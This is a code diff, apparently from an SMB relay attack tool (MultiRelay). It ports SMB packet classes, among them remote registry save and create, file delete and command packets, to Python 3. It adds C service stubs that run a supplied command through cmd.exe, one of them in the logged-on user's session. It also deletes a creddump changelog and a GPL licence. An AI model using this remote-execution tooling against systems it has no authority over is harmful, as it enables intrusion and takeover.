-        self.fields["ContextHandleLen2"] = struct.pack("<i",len(str(self.fields["CMD"]))+1)
-        self.fields["CMD"] = self.fields["CMD"].encode('utf-16le')
+        self.fields["ContextHandleLen"] = StructWithLenPython2or3("<i",len(str(self.fields["CMD"]))+1)
+        self.fields["ContextHandleLen2"] = StructWithLenPython2or3("<i",len(str(self.fields["CMD"]))+1)
+        self.fields["CMD"] = self.fields["CMD"].encode('utf-16le').decode('latin-1')
 
 
 class OpenAndX(Packet):
@@ -875,7 +889,7 @@ class OpenAndX(Packet):
 
     ])
     def calculate(self):
-        self.fields["Bcc"] = struct.pack("<h",len(str(self.fields["Terminator"])+str(self.fields["File"])+str(self.fields["FileNull"])))
+        self.fields["Bcc"] = StructWithLenPython2or3("<h",len(str(self.fields["Terminator"])+str(self.fields["File"])+str(self.fields["FileNull"])))
 
 class ReadRequest(Packet):
     fields = OrderedDict([
@@ -937,7 +951,7 @@ class WriteRequestAndX(Packet):
         ("DataLenLow",            "\x0a\x00"),#actual Len
         ("DataOffset",            "\x3f\x00"),
         ("Bcc",                   "\x0a\x00"),
-        ("Padd",                  ""), 
+        ("Padd",                  ""),
         ("Data",                  ""),
 
     ])
@@ -963,8 +977,8 @@ class DeleteFileRequest(Packet):
     ])
 
     def calculate(self):
-        self.fields["File"] = self.fields["File"].encode('utf-16le')
-        self.fields["Bcc"] = struct.pack("<h",len(str(self.fields["BuffType"])+str(self.fields["File"])+str(self.fields["FileNull"])))
+        self.fields["File"] = self.fields["File"].encode('utf-16le').decode('latin-1')
+        self.fields["Bcc"] = StructWithLenPython2or3("<h",len(str(self.fields["BuffType"])+str(self.fields["File"])+str(self.fields["FileNull"])))
 
 class SMBEcho(Packet):
     fields = OrderedDict([
@@ -1008,17 +1022,17 @@ class SMBDCEWinRegOpenKey(Packet):
     def calculate(self):
         #Padding
         if len(str(self.fields["Key"]))%2==0:
-           self.fields["KeyTerminator"] = "\x00\x00\x00\x00"
+            self.fields["KeyTerminator"] = "\x00\x00\x00\x00"
         else:
-           self.fields["KeyTerminator"] = "\x00\x00"
+            self.fields["KeyTerminator"] = "\x00\x00"
         #Calc first.
-        self.fields["ActualKeyMaxSize"] = struct.pack("<i",len(str(self.fields["Key"]))+1)
-        self.fields["ActualKeySize"] = struct.pack("<i",len(str(self.fields["Key"]))+1)
+        self.fields["ActualKeyMaxSize"] = StructWithLenPython2or3("<i",len(str(self.fields["Key"]))+1)
+        self.fields["ActualKeySize"] = StructWithLenPython2or3("<i",len(str(self.fields["Key"]))+1)
         #Convert to unicode.
-        self.fields["Key"] = self.fields["Key"].encode('utf-16le')
+        self.fields["Key"] = self.fields["Key"].encode('utf-16le').decode('latin-1')
         #Recalculate again, in unicode this time.
-        self.fields["KeySizeUnicode"] = struct.pack("<h",len(str(self.fields["Key"]))+2)
-        self.fields["MaxKeySizeUnicode"] = struct.pack("<h",len(str(self.fields["Key"]))+2)
+        self.fields["KeySizeUnicode"] = StructWithLenPython2or3("<h",len(str(self.fields["Key"]))+2)
+        self.fields["MaxKeySizeUnicode"] = StructWithLenPython2or3("<h",len(str(self.fields["Key"]))+2)
 
 
 class SMBDCEWinRegQueryInfoKey(Packet):
@@ -1069,17 +1083,17 @@ class SMBDCEWinRegCreateKey(Packet):
     def calculate(self):
         #Padding
         if len(str(self.fields["KeyName"]))%2==0:
-           self.fields["KeyTerminator"] = "\x00\x00\x00\x00"
+            self.fields["KeyTerminator"] = "\x00\x00\x00\x00"
         else:
-           self.fields["KeyTerminator"] = "\x00\x00"
+            self.fields["KeyTerminator"] = "\x00\x00"
         #Calc first.
-        self.fields["ActualKeyMaxSize"] = struct.pack("<i",len(str(self.fields["KeyName"]))+1)
-        self.fields["ActualKeySize"] = struct.pack("<i",len(str(self.fields["KeyName"]))+1)
+        self.fields["ActualKeyMaxSize"] = StructWithLenPython2or3("<i",len(str(self.fields["KeyName"]))+1)
+        self.fields["ActualKeySize"] = StructWithLenPython2or3("<i",len(str(self.fields["KeyName"]))+1)
         #Convert to unicode.
-        self.fields["KeyName"] = self.fields["KeyName"].encode('utf-16le')
+        self.fields["KeyName"] = self.fields["KeyName"].encode('utf-16le').decode('latin-1')
         #Recalculate again, in unicode this time.
-        self.fields["KeySizeUnicode"] = struct.pack("<h",len(str(self.fields["KeyName"]))+2)
-        self.fields["MaxKeySizeUnicode"] = struct.pack("<h",len(str(self.fields["KeyName"]))+2)
+        self.fields["KeySizeUnicode"] = StructWithLenPython2or3("<h",len(str(self.fields["KeyName"]))+2)
+        self.fields["MaxKeySizeUnicode"] = StructWithLenPython2or3("<h",len(str(self.fields["KeyName"]))+2)
 
 class SMBDCEWinRegSaveKey(Packet):
     fields = OrderedDict([
@@ -1098,16 +1112,14 @@ class SMBDCEWinRegSaveKey(Packet):
     def calculate(self):
         #Padding
         if len(str(self.fields["File"]))%2==0:
-           self.fields["FileTerminator"] = "\x00\x00\x00\x00"
+            self.fields["FileTerminator"] = "\x00\x00\x00\x00"
         else:
-           self.fields["FileTerminator"] = "\x00\x00"
+            self.fields["FileTerminator"] = "\x00\x00"
         #Calc first.
-        self.fields["ActualFileMaxSize"] = struct.pack("<i",len(str(self.fields["File"]))+1)
-        self.fields["ActualFileSize"] = struct.pack("<i",len(str(self.fields["File"]))+1)
+        self.fields["ActualFileMaxSize"] = StructWithLenPython2or3("<i",len(str(self.fields["File"]))+1)
+        self.fields["ActualFileSize"] = StructWithLenPython2or3("<i",len(str(self.fields["File"]))+1)
         #Convert to unicode.
-        self.fields["File"] = self.fields["File"].encode('utf-16le')
+        self.fields["File"] = self.fields["File"].encode('utf-16le').decode('latin-1')
         #Recalculate again, in unicode this time.
-        self.fields["FileSizeUnicode"] = struct.pack("<h",len(str(self.fields["File"]))+2)
-        self.fields["MaxFileSizeUnicode"] = struct.pack("<h",len(str(self.fields["File"]))+2)
-
-
+        self.fields["FileSizeUnicode"] = StructWithLenPython2or3("<h",len(str(self.fields["File"]))+2)
+        self.fields["MaxFileSizeUnicode"] = StructWithLenPython2or3("<h",len(str(self.fields["File"]))+2)

tools/MultiRelay/bin/Runas.c

@@ -0,0 +1,100 @@
+/*	Benjamin DELPY `gentilkiwi`
+	http://blog.gentilkiwi.com
+	benjamin@gentilkiwi.com
+	Licence : https://creativecommons.org/licenses/by/4.0/
+*/
+#include <windows.h>
+#include <userenv.h>
+#include <wtsapi32.h>
+
+int wmain(int argc, wchar_t * argv[]);
+void WINAPI ServiceMain(DWORD argc, LPWSTR *argv);
+void WINAPI ServiceCtrlHandler(DWORD Opcode);
+
+SERVICE_STATUS m_ServiceStatus = {SERVICE_WIN32_OWN_PROCESS, SERVICE_STOPPED, 0, NO_ERROR, 0, 0, 0};
+SERVICE_STATUS_HANDLE m_ServiceStatusHandle = NULL;
+HANDLE m_pyrsvcRunning;
+PWCHAR z_cmdLine, z_logFile;
+const WCHAR PYRSVC_NAME[] = L"pyrsvc", PYRSVC_PRE_CMD[] = L"cmd.exe /c \"", PYRSVC_POST_CMD[] = L"\" > ", PYRSVC_END_CMD[] = L" 2>&1";
+
+int wmain(int argc, wchar_t * argv[])
+{
+	int status = ERROR_SERVICE_NOT_IN_EXE;
+	const SERVICE_TABLE_ENTRY DispatchTable[]= {{(LPWSTR) PYRSVC_NAME, ServiceMain}, {NULL, NULL}};
+	if(argc == 3)
+	{
+		if(z_cmdLine = _wcsdup(argv[1]))
+		{
+			if(z_logFile = _wcsdup(argv[2]))
+			{
+				if(m_pyrsvcRunning = CreateEvent(NULL, TRUE, FALSE, NULL))
+				{
+					if(StartServiceCtrlDispatcher(DispatchTable))
+						status = ERROR_SUCCESS;
+					else status = GetLastError();
+					CloseHandle(m_pyrsvcRunning);
+				}
+				free(z_logFile);
+			}
+			free(z_cmdLine);
+		}
+	}
+	return status;
+}
+
+void WINAPI ServiceMain(DWORD argc, LPWSTR *argv)
+{
+	STARTUPINFO si = {0};
+	PROCESS_INFORMATION pi;
+	PWCHAR arguments;
+	DWORD size;
+	HANDLE hUser;
+	LPVOID env;
+	si.cb = sizeof(STARTUPINFO);
+	if(m_ServiceStatusHandle = RegisterServiceCtrlHandler(PYRSVC_NAME, ServiceCtrlHandler))
+	{
+		m_ServiceStatus.dwCurrentState = SERVICE_START_PENDING;
+		SetServiceStatus(m_ServiceStatusHandle, &m_ServiceStatus);
+		m_ServiceStatus.dwCurrentState = SERVICE_RUNNING;
+		m_ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP;
+		SetServiceStatus(m_ServiceStatusHandle, &m_ServiceStatus);
+
+		size = ((ARRAYSIZE(PYRSVC_PRE_CMD) - 1) + lstrlen(z_cmdLine) + (ARRAYSIZE(PYRSVC_POST_CMD) - 1) + lstrlen(z_logFile) + (ARRAYSIZE(PYRSVC_END_CMD) - 1) + 1) * sizeof(WCHAR);
+		if(arguments = (PWCHAR) malloc(size))
+		{
+			memset(arguments, '\0', size);
+			wcscat_s(arguments, size, PYRSVC_PRE_CMD);
+			wcscat_s(arguments, size, z_cmdLine);
+			wcscat_s(arguments, size, PYRSVC_POST_CMD);
+			wcscat_s(arguments, size, z_logFile);
+			wcscat_s(arguments, size, PYRSVC_END_CMD);
+			if(WTSQueryUserToken(WTSGetActiveConsoleSessionId(), &hUser))
+			{
+				if(CreateEnvironmentBlock(&env, hUser, FALSE))
+				{
+					if(CreateProcessAsUser(hUser, NULL, arguments, NULL, NULL, FALSE, CREATE_NO_WINDOW | CREATE_UNICODE_ENVIRONMENT, NULL, NULL, &si, &pi))
+					{
+						CloseHandle(pi.hThread);
+						CloseHandle(pi.hProcess);
+					}
+					DestroyEnvironmentBlock(env);
+				}
+				CloseHandle(hUser);
+			}
+			free(arguments);
+		}
+		WaitForSingleObject(m_pyrsvcRunning, INFINITE);
+		m_ServiceStatus.dwCurrentState = SERVICE_STOPPED;
+		SetServiceStatus(m_ServiceStatusHandle, &m_ServiceStatus);
+	}
+}
+
+void WINAPI ServiceCtrlHandler(DWORD Opcode)
+{
+	if((Opcode == SERVICE_CONTROL_STOP) || (Opcode == SERVICE_CONTROL_SHUTDOWN))
+	{
+		m_ServiceStatus.dwCurrentState = SERVICE_STOP_PENDING;
+		SetServiceStatus (m_ServiceStatusHandle, &m_ServiceStatus);
+		SetEvent(m_pyrsvcRunning);
+	}
+}

tools/MultiRelay/bin/Syssvc.c

@@ -0,0 +1,90 @@
+/*	Benjamin DELPY `gentilkiwi`
+	http://blog.gentilkiwi.com
+	benjamin@gentilkiwi.com
+	Licence : https://creativecommons.org/licenses/by/4.0/
+*/
+#include <windows.h>
+
+int wmain(int argc, wchar_t * argv[]);
+void WINAPI ServiceMain(DWORD argc, LPWSTR *argv);
+void WINAPI ServiceCtrlHandler(DWORD Opcode);
+
+SERVICE_STATUS m_ServiceStatus = {SERVICE_WIN32_OWN_PROCESS, SERVICE_STOPPED, 0, NO_ERROR, 0, 0, 0};
+SERVICE_STATUS_HANDLE m_ServiceStatusHandle = NULL;
+HANDLE m_pyrsvcRunning;
+PWCHAR z_cmdLine, z_logFile;
+const WCHAR PYRSVC_NAME[] = L"pyrsvc", PYRSVC_PRE_CMD[] = L"cmd.exe /c \"", PYRSVC_POST_CMD[] = L"\" > ", PYRSVC_END_CMD[] = L" 2>&1";
+
+int wmain(int argc, wchar_t * argv[])
+{
+	int status = ERROR_SERVICE_NOT_IN_EXE;
+	const SERVICE_TABLE_ENTRY DispatchTable[]= {{(LPWSTR) PYRSVC_NAME, ServiceMain}, {NULL, NULL}};
+	if(argc == 3)
+	{
+		if(z_cmdLine = _wcsdup(argv[1]))
+		{
+			if(z_logFile = _wcsdup(argv[2]))
+			{
+				if(m_pyrsvcRunning = CreateEvent(NULL, TRUE, FALSE, NULL))
+				{
+					if(StartServiceCtrlDispatcher(DispatchTable))
+						status = ERROR_SUCCESS;
+					else status = GetLastError();
+					CloseHandle(m_pyrsvcRunning);
+				}
+				free(z_logFile);
+			}
+			free(z_cmdLine);
+		}
+	}
+	return status;
+}
+
+void WINAPI ServiceMain(DWORD argc, LPWSTR *argv)
+{
+	STARTUPINFO si = {0};
+	PROCESS_INFORMATION pi;
+	PWCHAR arguments;
+	DWORD size;
+	si.cb = sizeof(STARTUPINFO);
+	if(m_ServiceStatusHandle = RegisterServiceCtrlHandler(PYRSVC_NAME, ServiceCtrlHandler))
+	{
+		m_ServiceStatus.dwCurrentState = SERVICE_START_PENDING;
+		SetServiceStatus(m_ServiceStatusHandle, &m_ServiceStatus);
+		m_ServiceStatus.dwCurrentState = SERVICE_RUNNING;
+		m_ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP;
+		SetServiceStatus(m_ServiceStatusHandle, &m_ServiceStatus);
+
+		size = ((ARRAYSIZE(PYRSVC_PRE_CMD) - 1) + lstrlen(z_cmdLine) + (ARRAYSIZE(PYRSVC_POST_CMD) - 1) + lstrlen(z_logFile) + (ARRAYSIZE(PYRSVC_END_CMD) - 1) + 1) * sizeof(WCHAR);
+		if(arguments = (PWCHAR) malloc(size))
+		{
+			memset(arguments, '\0', size);
+			wcscat_s(arguments, size, PYRSVC_PRE_CMD);
+			wcscat_s(arguments, size, z_cmdLine);
+			wcscat_s(arguments, size, PYRSVC_POST_CMD);
+			wcscat_s(arguments, size, z_logFile);
+			wcscat_s(arguments, size, PYRSVC_END_CMD);
+
+			if(CreateProcess(NULL, arguments, NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi))
+			{
+				CloseHandle(pi.hThread);
+				CloseHandle(pi.hProcess);
+			}
+
+			free(arguments);
+		}
+		WaitForSingleObject(m_pyrsvcRunning, INFINITE);
+		m_ServiceStatus.dwCurrentState = SERVICE_STOPPED;
+		SetServiceStatus(m_ServiceStatusHandle, &m_ServiceStatus);
+	}
+}
+
+void WINAPI ServiceCtrlHandler(DWORD Opcode)
+{
+	if((Opcode == SERVICE_CONTROL_STOP) || (Opcode == SERVICE_CONTROL_SHUTDOWN))
+	{
+		m_ServiceStatus.dwCurrentState = SERVICE_STOP_PENDING;
+		SetServiceStatus (m_ServiceStatusHandle, &m_ServiceStatus);
+		SetEvent(m_pyrsvcRunning);
+	}
+}

tools/MultiRelay/creddump/CHANGELOG

@@ -1,9 +0,0 @@
-Version: 0.3 Date: 8/1/2012
-
-* Fixed LM and NTLM Hash Corruption issue. Thanks to Jonathan Claudius.
-  Closes Issue 3.
-
-Version: 0.2 Date: 2/24/2011
-
-* Fixed issue with wrong format specifier being used (L instead of I), which
-caused creddump to fail on 64-bit systems.

tools/MultiRelay/creddump/COPYING

@@ -1,674 +0,0 @@
-                    GNU GENERAL PUBLIC LICENSE
-                       Version 3, 29 June 2007
-
- Copyright (C) 2007 Free Software Foundation, Inc. <http://fsf.org/>
- Everyone is permitted to copy and distribute verbatim copies
- of this license document, but changing it is not allowed.
-
-                            Preamble
-
-  The GNU General Public License is a free, copyleft license for
-software and other kinds of works.
-
-  The licenses for most software and other practical works are designed
-to take away your freedom to share and change the works.  By contrast,
-the GNU General Public License is intended to guarantee your freedom to
-share and change all versions of a program--to make sure it remains free
-software for all its users.  We, the Free Software Foundation, use the
-GNU General Public License for most of our software; it applies also to
-any other work released this way by its authors.  You can apply it to
-your programs, too.
-
-  When we speak of free software, we are referring to freedom, not
-price.  Our General Public Licenses are designed to make sure that you
-have the freedom to distribute copies of free software (and charge for
-them if you wish), that you receive source code or can get it if you
-want it, that you can change the software or use pieces of it in new
-free programs, and that you know you can do these things.
-
-  To protect your rights, we need to prevent others from denying you
-these rights or asking you to surrender the rights.  Therefore, you have
-certain responsibilities if you distribute copies of the software, or if
-you modify it: responsibilities to respect the freedom of others.
-
-  For example, if you distribute copies of such a program, whether
-gratis or for a fee, you must pass on to the recipients the same
-freedoms that you received.  You must make sure that they, too, receive
-or can get the source code.  And you must show them these terms so they
-know their rights.
-
-  Developers that use the GNU GPL protect your rights with two steps:
-(1) assert copyright on the software, and (2) offer you this License
-giving you legal permission to copy, distribute and/or modify it.
-
-  For the developers' and authors' protection, the GPL clearly explains
-that there is no warranty for this free software.  For both users' and
-authors' sake, the GPL requires that modified versions be marked as
-changed, so that their problems will not be attributed erroneously to
-authors of previous versions.
-
-  Some devices are designed to deny users access to install or run
-modified versions of the software inside them, although the manufacturer
-can do so.  This is fundamentally incompatible with the aim of
-protecting users' freedom to change the software.  The systematic
-pattern of such abuse occurs in the area of products for individuals to
-use, which is precisely where it is most unacceptable.  Therefore, we
-have designed this version of the GPL to prohibit the practice for those
-products.  If such problems arise substantially in other domains, we
-stand ready to extend this provision to those domains in future versions
-of the GPL, as needed to protect the freedom of users.
-
-  Finally, every program is threatened constantly by software patents.
-States should not allow patents to restrict development and use of
-software on general-purpose computers, but in those that do, we wish to
-avoid the special danger that patents applied to a free program could
-make it effectively proprietary.  To prevent this, the GPL assures that
-patents cannot be used to render the program non-free.
-
-  The precise terms and conditions for copying, distribution and
-modification follow.
-
-                       TERMS AND CONDITIONS
-
-  0. Definitions.
-
-  "This License" refers to version 3 of the GNU General Public License.
-
-  "Copyright" also means copyright-like laws that apply to other kinds of
-works, such as semiconductor masks.
-
-  "The Program" refers to any copyrightable work licensed under this
-License.  Each licensee is addressed as "you".  "Licensees" and
-"recipients" may be individuals or organizations.
-
-  To "modify" a work means to copy from or adapt all or part of the work
-in a fashion requiring copyright permission, other than the making of an
-exact copy.  The resulting work is called a "modified version" of the
-earlier work or a work "based on" the earlier work.
-
-  A "covered work" means either the unmodified Program or a work based
-on the Program.
-
-  To "propagate" a work means to do anything with it that, without
-permission, would make you directly or secondarily liable for
-infringement under applicable copyright law, except executing it on a
-computer or modifying a private copy.  Propagation includes copying,
-distribution (with or without modification), making available to the
-public, and in some countries other activities as well.
-
-  To "convey" a work means any kind of propagation that enables other
-parties to make or receive copies.  Mere interaction with a user through
-a computer network, with no transfer of a copy, is not conveying.
-
-  An interactive user interface displays "Appropriate Legal Notices"
-to the extent that it includes a convenient and prominently visible
-feature that (1) displays an appropriate copyright notice, and (2)
-tells the user that there is no warranty for the work (except to the
-extent that warranties are provided), that licensees may convey the
-work under this License, and how to view a copy of this License.  If
-the interface presents a list of user commands or options, such as a
-menu, a prominent item in the list meets this criterion.
-
-  1. Source Code.
-
-  The "source code" for a work means the preferred form of the work
-for making modifications to it.  "Object code" means any non-source
-form of a work.
-
-  A "Standard Interface" means an interface that either is an official
-standard defined by a recognized standards body, or, in the case of
-interfaces specified for a particular programming language, one that
-is widely used among developers working in that language.
-
-  The "System Libraries" of an executable work include anything, other
-than the work as a whole, that (a) is included in the normal form of
-packaging a Major Component, but which is not part of that Major
-Component, and (b) serves only to enable use of the work with that
-Major Component, or to implement a Standard Interface for which an
-implementation is available to the public in source code form.  A
-"Major Component", in this context, means a major essential component
-(kernel, window system, and so on) of the specific operating system
-(if any) on which the executable work runs, or a compiler used to
-produce the work, or an object code interpreter used to run it.
-
-  The "Corresponding Source" for a work in object code form means all
-the source code needed to generate, install, and (for an executable
-work) run the object code and to modify the work, including scripts to
-control those activities.  However, it does not include the work's
-System Libraries, or general-purpose tools or generally available free
-programs which are used unmodified in performing those activities but
-which are not part of the work.  For example, Corresponding Source
-includes interface definition files associated with source files for
-the work, and the source code for shared libraries and dynamically
-linked subprograms that the work is specifically designed to require,
-such as by intimate data communication or control flow between those
-subprograms and other parts of the work.
-
-  The Corresponding Source need not include anything that users
-can regenerate automatically from other parts of the Corresponding
-Source.
-
-  The Corresponding Source for a work in source code form is that
-same work.
-
-  2. Basic Permissions.
-
-  All rights granted under this License are granted for the term of
-copyright on the Program, and are irrevocable provided the stated
-conditions are met.  This License explicitly affirms your unlimited
-permission to run the unmodified Program.  The output from running a
-covered work is covered by this License only if the output, given its
-content, constitutes a covered work.  This License acknowledges your
-rights of fair use or other equivalent, as provided by copyright law.
-
-  You may make, run and propagate covered works that you do not
-convey, without conditions so long as your license otherwise remains
-in force.  You may convey covered works to others for the sole purpose
-of having them make modifications exclusively for you, or provide you
-with facilities for running those works, provided that you comply with
-the terms of this License in conveying all material for which you do
-not control copyright.  Those thus making or running the covered works
-for you must do so exclusively on your behalf, under your direction
-and control, on terms that prohibit them from making any copies of
-your copyrighted material outside their relationship with you.
-
-  Conveying under any other circumstances is permitted solely under
-the conditions stated below.  Sublicensing is not allowed; section 10
-makes it unnecessary.
-
-  3. Protecting Users' Legal Rights From Anti-Circumvention Law.
-
-  No covered work shall be deemed part of an effective technological
-measure under any applicable law fulfilling obligations under article
-11 of the WIPO copyright treaty adopted on 20 December 1996, or
-similar laws prohibiting or restricting circumvention of such
-measures.
-
-  When you convey a covered work, you waive any legal power to forbid
-circumvention of technological measures to the extent such circumvention
-is effected by exercising rights under this License with respect to
-the covered work, and you disclaim any intention to limit operation or
-modification of the work as a means of enforcing, against the work's
-users, your or third parties' legal rights to forbid circumvention of
-technological measures.
-
-  4. Conveying Verbatim Copies.
-
-  You may convey verbatim copies of the Program's source code as you
-receive it, in any medium, provided that you conspicuously and
-appropriately publish on each copy an appropriate copyright notice;
-keep intact all notices stating that this License and any
-non-permissive terms added in accord with section 7 apply to the code;
-keep intact all notices of the absence of any warranty; and give all
-recipients a copy of this License along with the Program.
-
-  You may charge any price or no price for each copy that you convey,
-and you may offer support or warranty protection for a fee.
-
-  5. Conveying Modified Source Versions.
-
-  You may convey a work based on the Program, or the modifications to
-produce it from the Program, in the form of source code under the
-terms of section 4, provided that you also meet all of these conditions:
-
-    a) The work must carry prominent notices stating that you modified
-    it, and giving a relevant date.
-
-    b) The work must carry prominent notices stating that it is
-    released under this License and any conditions added under section
-    7.  This requirement modifies the requirement in section 4 to
-    "keep intact all notices".
-
-    c) You must license the entire work, as a whole, under this
-    License to anyone who comes into possession of a copy.  This
-    License will therefore apply, along with any applicable section 7
-    additional terms, to the whole of the work, and all its parts,
-    regardless of how they are packaged.  This License gives no
-    permission to license the work in any other way, but it does not
-    invalidate such permission if you have separately received it.
-
-    d) If the work has interactive user interfaces, each must display
-    Appropriate Legal Notices; however, if the Program has interactive
-    interfaces that do not display Appropriate Legal Notices, your
-    work need not make them do so.
-
-  A compilation of a covered work with other separate and independent
-works, which are not by their nature extensions of the covered work,
-and which are not combined with it such as to form a larger program,
-in or on a volume of a storage or distribution medium, is called an
-"aggregate" if the compilation and its resulting copyright are not
-used to limit the access or legal rights of the compilation's users
-beyond what the individual works permit.  Inclusion of a covered work
-in an aggregate does not cause this License to apply to the other
-parts of the aggregate.
-
-  6. Conveying Non-Source Forms.
-
-  You may convey a covered work in object code form under the terms
-of sections 4 and 5, provided that you also convey the
-machine-readable Corresponding Source under the terms of this License,
-in one of these ways:
-
-    a) Convey the object code in, or embodied in, a physical product
-    (including a physical distribution medium), accompanied by the
-    Corresponding Source fixed on a durable physical medium
-    customarily used for software interchange.
-
-    b) Convey the object code in, or embodied in, a physical product
-    (including a physical distribution medium), accompanied by a
-    written offer, valid for at least three years and valid for as
-    long as you offer spare parts or customer support for that product
-    model, to give anyone who possesses the object code either (1) a
-    copy of the Corresponding Source for all the software in the
-    product that is covered by this License, on a durable physical
-    medium customarily used for software interchange, for a price no
-    more than your reasonable cost of physically performing this
-    conveying of source, or (2) access to copy the
-    Corresponding Source from a network server at no charge.
-
-    c) Convey individual copies of the object code with a copy of the
-    written offer to provide the Corresponding Source.  This
-    alternative is allowed only occasionally and noncommercially, and
-    only if you received the object code with such an offer, in accord
-    with subsection 6b.
-
-    d) Convey the object code by offering access from a designated
-    place (gratis or for a charge), and offer equivalent access to the
-    Corresponding Source in the same way through the same place at no
-    further charge.  You need not require recipients to copy the
-    Corresponding Source along with the object code.  If the place to
-    copy the object code is a network server, the Corresponding Source
-    may be on a different server (operated by you or a third party)
-    that supports equivalent copying facilities, provided you maintain
-    clear directions next to the object code saying where to find the
-    Corresponding Source.  Regardless of what server hosts the
-    Corresponding Source, you remain obligated to ensure that it is
-    available for as long as needed to satisfy these requirements.
-
-    e) Convey the object code using peer-to-peer transmission, provided
-    you inform other peers where the object code and Corresponding
-    Source of the work are being offered to the general public at no
-    charge under subsection 6d.
-
-  A separable portion of the object code, whose source code is excluded
-from the Corresponding Source as a System Library, need not be
-included in conveying the object code work.
-
-  A "User Product" is either (1) a "consumer product", which means any
-tangible personal property which is normally used for personal, family,
-or household purposes, or (2) anything designed or sold for incorporation
-into a dwelling.  In determining whether a product is a consumer product,
-doubtful cases shall be resolved in favor of coverage.  For a particular
-product received by a particular user, "normally used" refers to a
-typical or common use of that class of product, regardless of the status
-of the particular user or of the way in which the particular user
-actually uses, or expects or is expected to use, the product.  A product
-is a consumer product regardless of whether the product has substantial
-commercial, industrial or non-consumer uses, unless such uses represent
-the only significant mode of use of the product.
-
-  "Installation Information" for a User Product means any methods,
-procedures, authorization keys, or other information required to install
-and execute modified versions of a covered work in that User Product from
-a modified version of its Corresponding Source.  The information must
-suffice to ensure that the continued functioning of the modified object
-code is in no case prevented or interfered with solely because
-modification has been made.
-
-  If you convey an object code work under this section in, or with, or
-specifically for use in, a User Product, and the conveying occurs as
-part of a transaction in which the right of possession and use of the
-User Product is transferred to the recipient in perpetuity or for a
-fixed term (regardless of how the transaction is characterized), the
-Corresponding Source conveyed under this section must be accompanied
-by the Installation Information.  But this requirement does not apply
-if neither you nor any third party retains the ability to install
-modified object code on the User Product (for example, the work has
-been installed in ROM).
-
-  The requirement to provide Installation Information does not include a
-requirement to continue to provide support service, warranty, or updates
-for a work that has been modified or installed by the recipient, or for
-the User Product in which it has been modified or installed.  Access to a
-network may be denied when the modification itself materially and
-adversely affects the operation of the network or violates the rules and
-protocols for communication across the network.
-
-  Corresponding Source conveyed, and Installation Information provided,
-in accord with this section must be in a format that is publicly
-documented (and with an implementation available to the public in
-source code form), and must require no special password or key for
-unpacking, reading or copying.
-
-  7. Additional Terms.
-
-  "Additional permissions" are terms that supplement the terms of this
-License by making exceptions from one or more of its conditions.
-Additional permissions that are applicable to the entire Program shall
-be treated as though they were included in this License, to the extent
-that they are valid under applicable law.  If additional permissions
-apply only to part of the Program, that part may be used separately
-under those permissions, but the entire Program remains governed by
-this License without regard to the additional permissions.
-
-  When you convey a copy of a covered work, you may at your option
-remove any additional permissions from that copy, or from any part of
-it.  (Additional permissions may be written to require their own
-removal in certain cases when you modify the work.)  You may place
-additional permissions on material, added by you to a covered work,
-for which you have or can give appropriate copyright permission.
-
-  Notwithstanding any other provision of this License, for material you
-add to a covered work, you may (if authorized by the copyright holders of
-that material) supplement the terms of this License with terms:
-
-    a) Disclaiming warranty or limiting liability differently from the
-    terms of sections 15 and 16 of this License; or
-
-    b) Requiring preservation of specified reasonable legal notices or
-    author attributions in that material or in the Appropriate Legal
-    Notices displayed by works containing it; or
-
-    c) Prohibiting misrepresentation of the origin of that material, or
-    requiring that modified versions of such material be marked in
-    reasonable ways as different from the original version; or
-
-    d) Limiting the use for publicity purposes of names of licensors or
-    authors of the material; or
-
-    e) Declining to grant rights under trademark law for use of some
-    trade names, trademarks, or service marks; or
-
-    f) Requiring indemnification of licensors and authors of that
-    material by anyone who conveys the material (or modified versions of
-    it) with contractual assumptions of liability to the recipient, for
-    any liability that these contractual assumptions directly impose on
-    those licensors and authors.
-
-  All other non-permissive additional terms are considered "further
-restrictions" within the meaning of section 10.  If the Program as you
-received it, or any part of it, contains a notice stating that it is
-governed by this License along with a term that is a further
-restriction, you may remove that term.  If a license document contains
-a further restriction but permits relicensing or conveying under this
-License, you may add to a covered work material governed by the terms
-of that license document, provided that the further restriction does
-not survive such relicensing or conveying.
-
-  If you add terms to a covered work in accord with this section, you
-must place, in the relevant source files, a statement of the
-additional terms that apply to those files, or a notice indicating
-where to find the applicable terms.
-
-  Additional terms, permissive or non-permissive, may be stated in the
-form of a separately written license, or stated as exceptions;
-the above requirements apply either way.
-
-  8. Termination.
-
-  You may not propagate or modify a covered work except as expressly
-provided under this License.  Any attempt otherwise to propagate or
-modify it is void, and will automatically terminate your rights under
-this License (including any patent licenses granted under the third
-paragraph of section 11).
-
-  However, if you cease all violation of this License, then your
-license from a particular copyright holder is reinstated (a)
-provisionally, unless and until the copyright holder explicitly and
-finally terminates your license, and (b) permanently, if the copyright
-holder fails to notify you of the violation by some reasonable means
-prior to 60 days after the cessation.
-
-  Moreover, your license from a particular copyright holder is
-reinstated permanently if the copyright holder notifies you of the
-violation by some reasonable means, this is the first time you have
-received notice of violation of this License (for any work) from that
-copyright holder, and you cure the violation prior to 30 days after
-your receipt of the notice.
-
-  Termination of your rights under this section does not terminate the
-licenses of parties who have received copies or rights from you under
-this License.  If your rights have been terminated and not permanently
-reinstated, you do not qualify to receive new licenses for the same
-material under section 10.
-
-  9. Acceptance Not Required for Having Copies.
-
-  You are not required to accept this License in order to receive or
-run a copy of the Program.  Ancillary propagation of a covered work
-occurring solely as a consequence of using peer-to-peer transmission
-to receive a copy likewise does not require acceptance.  However,
-nothing other than this License grants you permission to propagate or
-modify any covered work.  These actions infringe copyright if you do
-not accept this License.  Therefore, by modifying or propagating a
-covered work, you indicate your acceptance of this License to do so.
-
-  10. Automatic Licensing of Downstream Recipients.
-
-  Each time you convey a covered work, the recipient automatically
-receives a license from the original licensors, to run, modify and
-propagate that work, subject to this License.  You are not responsible
-for enforcing compliance by third parties with this License.
-
-  An "entity transaction" is a transaction transferring control of an
-organization, or substantially all assets of one, or subdividing an
-organization, or merging organizations.  If propagation of a covered
-work results from an entity transaction, each party to that
-transaction who receives a copy of the work also receives whatever
-licenses to the work the party's predecessor in interest had or could
-give under the previous paragraph, plus a right to possession of the
-Corresponding Source of the work from the predecessor in interest, if
-the predecessor has it or can get it with reasonable efforts.
-
-  You may not impose any further restrictions on the exercise of the
-rights granted or affirmed under this License.  For example, you may
-not impose a license fee, royalty, or other charge for exercise of
-rights granted under this License, and you may not initiate litigation
